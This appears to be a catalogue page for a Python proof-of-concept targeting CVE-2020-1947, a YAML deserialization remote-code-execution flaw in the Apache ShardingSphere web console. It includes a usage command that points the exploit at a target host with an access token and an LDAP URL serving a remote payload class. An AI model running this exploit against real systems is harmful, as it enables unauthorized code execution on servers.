CVE-2020-1947 PoC — Apache ShardingSphere Code Issue Vulnerability

Associated Vulnerability
Title: Apache ShardingSphere Code Issue Vulnerability (CVE-2020-1947)
Description: In Apache ShardingSphere (incubator) 4.0.0-RC3 and 4.0.0, the ShardingSphere web console uses the SnakeYAML library to parse YAML input when loading datasource configuration. SnakeYAML allows data to be unmarshalled to a Java type by using the YAML tag. Unmarshalling untrusted data can lead to remote code execution (RCE).
Description
CVE-2020-1947 Python POC
Readme
# CVE-2020-1947

```
usage: CVE-2020-1947.py [-h] -i IP -p PORT -T ACCESS_TOKEN -poc POC

python CVE-2020-1947.py -i 192.168.128.135 -p 8088 -T eyJ1c2VybmFtZSI6ImFk******* -poc ldap://127.0.0.1:1389/CommandObject

```
File Snapshot

```
[4.0K] /data/pocs/2551f6051424634b45fc68b6ca835d09d948afa2
├── [1.6K] CVE-2020-1947.py
└── [ 218] README.md

0 directories, 2 files
```